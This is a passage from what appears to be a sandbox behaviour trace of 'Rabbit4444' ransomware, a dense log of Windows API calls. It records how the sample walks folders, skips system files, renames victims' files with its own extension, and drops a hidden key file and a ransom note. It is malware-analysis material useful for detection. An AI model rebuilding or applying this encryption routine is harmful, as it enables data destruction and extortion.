lpString2="pagefile.sys") returned -1 [0063.012] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", lpString2="boot") returned 1 [0063.012] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", lpString2="ids.txt") returned -1 [0063.012] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", lpString2="NTUSER.DAT") returned -1 [0063.012] lstrcpyW (in: lpString1=0x130ec1c, lpString2="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF" | out: lpString1="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF") returned="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF" [0063.012] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", dwFileAttributes=0x2020) returned 1 [0063.013] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", dwFileAttributes=0x2004) returned 1 [0063.013] lstrlenW (lpString="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF") returned 65 [0063.013] lstrlenW (lpString="Rabbit4444") returned 10 [0063.013] lstrcmpiW (lpString1="2451D392CF", lpString2="Rabbit4444") returned -1 [0063.013] lstrlenW (lpString=".dll") returned 4 [0063.013] lstrcmpiW (lpString1="92CF", lpString2=".dll") returned 1 [0063.013] lstrlenW (lpString=".lnk") returned 4 [0063.013] lstrcmpiW (lpString1="92CF", lpString2=".lnk") returned 1 [0063.013] lstrlenW (lpString=".ini") returned 4 [0063.013] lstrcmpiW (lpString1="92CF", lpString2=".ini") returned 1 [0063.013] lstrlenW (lpString=".sys") returned 4 [0063.013] lstrcmpiW (lpString1="92CF", lpString2=".sys") returned 1 [0063.013] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\ac\\microsoft\\cryptneturlcache\\content\\c46e7b0f942663a1edc8d9d6d7869173_d9b9f37ece595b0b7b6aa12451d392cf"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0063.014] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0063.014] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15432453915) returned 1 [0063.014] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1763) returned 1 [0063.014] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117770 [0063.014] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0063.014] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x9f0, lpName=0x0) returned 0x27c [0063.015] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x9f0) returned 0x70000 [0063.016] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x123820 [0063.016] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0063.016] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123820 | out: hHeap=0xe0000) returned 1 [0063.016] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0063.016] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0063.016] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0063.016] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0063.017] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0063.017] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15432730815) returned 1 [0063.017] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117770 | out: hHeap=0xe0000) returned 1 [0063.017] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0063.017] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.017] CloseHandle (hObject=0x27c) returned 1 [0063.017] CloseHandle (hObject=0x2a0) returned 1 [0063.017] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF.Rabbit4444") returned 190 [0063.017] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\ac\\microsoft\\cryptneturlcache\\content\\c46e7b0f942663a1edc8d9d6d7869173_d9b9f37ece595b0b7b6aa12451d392cf"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\ac\\microsoft\\cryptneturlcache\\content\\c46e7b0f942663a1edc8d9d6d7869173_d9b9f37ece595b0b7b6aa12451d392cf.rabbit4444"), dwFlags=0x1) returned 1 [0063.018] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xdaf50849, ftCreationTime.dwHighDateTime=0x1d336df, ftLastAccessTime.dwLowDateTime=0xdaf50849, ftLastAccessTime.dwHighDateTime=0x1d336df, ftLastWriteTime.dwLowDateTime=0xdaf50849, ftLastWriteTime.dwHighDateTime=0x1d336df, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FB0D848F74F70BB2EAA93746D24D9749", cAlternateFileName="FB0D84~1")) returned 1 [0063.018] lstrcmpiW (lpString1="FB0D848F74F70BB2EAA93746D24D9749", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.018] lstrcmpiW (lpString1="FB0D848F74F70BB2EAA93746D24D9749", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.018] lstrcmpiW (lpString1="FB0D848F74F70BB2EAA93746D24D9749", lpString2="Rabbit4444.exe") returned -1 [0063.018] lstrcmpiW (lpString1="FB0D848F74F70BB2EAA93746D24D9749", lpString2=".") returned 1 [0063.018] lstrcmpiW (lpString1="FB0D848F74F70BB2EAA93746D24D9749", lpString2="..") returned 1 [0063.018] lstrcmpiW (lpString1="FB0D848F74F70BB2EAA93746D24D9749", lpString2="windows") returned -1 [0063.018] lstrcmpiW (lpString1="FB0D848F74F70BB2EAA93746D24D9749", lpString2="bootmgr") returned 1 [0063.018] lstrcmpiW (lpString1="FB0D848F74F70BB2EAA93746D24D9749", lpString2="pagefile.sys") returned -1 [0063.018] lstrcmpiW (lpString1="FB0D848F74F70BB2EAA93746D24D9749", lpString2="boot") returned 1 [0063.018] lstrcmpiW (lpString1="FB0D848F74F70BB2EAA93746D24D9749", lpString2="ids.txt") returned -1 [0063.018] lstrcmpiW (lpString1="FB0D848F74F70BB2EAA93746D24D9749", lpString2="NTUSER.DAT") returned -1 [0063.018] lstrcpyW (in: lpString1=0x130ec1c, lpString2="FB0D848F74F70BB2EAA93746D24D9749" | out: lpString1="FB0D848F74F70BB2EAA93746D24D9749") returned="FB0D848F74F70BB2EAA93746D24D9749" [0063.018] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\Content\\FB0D848F74F70BB2EAA93746D24D9749", dwFileAttributes=0x2020) returned 1 [0063.019] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\Content\\FB0D848F74F70BB2EAA93746D24D9749", dwFileAttributes=0x2004) returned 1 [0063.019] lstrlenW (lpString="FB0D848F74F70BB2EAA93746D24D9749") returned 32 [0063.019] lstrlenW (lpString="Rabbit4444") returned 10 [0063.019] lstrcmpiW (lpString1="46D24D9749", lpString2="Rabbit4444") returned -1 [0063.019] lstrlenW (lpString=".dll") returned 4 [0063.019] lstrcmpiW (lpString1="9749", lpString2=".dll") returned 1 [0063.019] lstrlenW (lpString=".lnk") returned 4 [0063.019] lstrcmpiW (lpString1="9749", lpString2=".lnk") returned 1 [0063.019] lstrlenW (lpString=".ini") returned 4 [0063.019] lstrcmpiW (lpString1="9749", lpString2=".ini") returned 1 [0063.019] lstrlenW (lpString=".sys") returned 4 [0063.019] lstrcmpiW (lpString1="9749", lpString2=".sys") returned 1 [0063.019] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xdaf50849, ftCreationTime.dwHighDateTime=0x1d336df, ftLastAccessTime.dwLowDateTime=0xdaf50849, ftLastAccessTime.dwHighDateTime=0x1d336df, ftLastWriteTime.dwLowDateTime=0xdaf50849, ftLastWriteTime.dwHighDateTime=0x1d336df, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FB0D848F74F70BB2EAA93746D24D9749", cAlternateFileName="FB0D84~1")) returned 0 [0063.019] FindClose (in: hFindFile=0x102a50 | out: hFindFile=0x102a50) returned 1 [0063.019] lstrcpyW (in: lpString1=0x130ec1c, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0063.019] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\Content\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\ac\\microsoft\\cryptneturlcache\\content\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0063.020] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0063.020] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0063.020] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.020] CloseHandle (hObject=0x2a0) returned 1 [0063.020] CloseHandle (hObject=0x298) returned 1 [0063.020] GetCurrentThreadId () returned 0xd98 [0063.020] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1222e8 [0063.020] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetHistory", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetHistory") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetHistory" [0063.020] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123760 | out: hHeap=0xe0000) returned 1 [0063.021] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1222e0 | out: hHeap=0xe0000) returned 1 [0063.021] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetHistory" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetHistory") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetHistory" [0063.021] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetHistory", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetHistory\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetHistory\\" [0063.021] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetHistory\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3" [0063.021] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\ac\\inethistory\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0063.022] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0063.024] FlushFileBuffers (hFile=0x298) returned 1 [0063.025] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0063.025] CloseHandle (hObject=0x298) returned 1 [0063.026] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetHistory") returned 90 [0063.026] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0063.026] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetHistory\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x41ee58e, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1d44c20, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeee394bc, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0063.026] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.026] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.026] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0063.026] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.026] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x41ee58e, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1d44c20, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeee394bc, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.026] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.026] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.026] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0063.026] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.026] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.026] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeee394bc, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeee394bc, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeee394bc, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0063.026] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.026] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0063.026] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeee394bc, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeee394bc, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeee394bc, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0063.026] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0063.026] lstrcpyW (in: lpString1=0x130ebee, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0063.027] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetHistory\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\ac\\inethistory\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0063.027] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0063.027] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0063.027] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.027] CloseHandle (hObject=0x2a0) returned 1 [0063.027] CloseHandle (hObject=0x298) returned 1 [0063.028] GetCurrentThreadId () returned 0xd98 [0063.028] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1222c8 [0063.028] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetCookies", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetCookies") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetCookies" [0063.028] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e380 | out: hHeap=0xe0000) returned 1 [0063.028] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1222c0 | out: hHeap=0xe0000) returned 1 [0063.028] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetCookies" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetCookies") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetCookies" [0063.028] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetCookies", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetCookies\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetCookies\\" [0063.028] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetCookies\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3" [0063.028] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\ac\\inetcookies\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0063.029] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0063.032] FlushFileBuffers (hFile=0x298) returned 1 [0063.033] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0063.033] CloseHandle (hObject=0x298) returned 1 [0063.033] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetCookies") returned 90 [0063.033] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0063.033] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetCookies\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x42147ef, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1d440c7, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeee394bc, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a90 [0063.033] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.033] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.034] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0063.034] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.034] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x42147ef, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1d440c7, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeee394bc, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.034] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.034] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.034] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0063.034] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.034] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.034] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeee394bc, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeee394bc, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeee394bc, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0063.034] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.034] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0063.034] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x88ced4a1, ftCreationTime.dwHighDateTime=0x1d32716, ftLastAccessTime.dwLowDateTime=0x88ced4a1, ftLastAccessTime.dwHighDateTime=0x1d32716, ftLastWriteTime.dwLowDateTime=0x88ced4a1, ftLastWriteTime.dwHighDateTime=0x1d32716, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="container.dat", cAlternateFileName="CONTAI~1.DAT")) returned 1 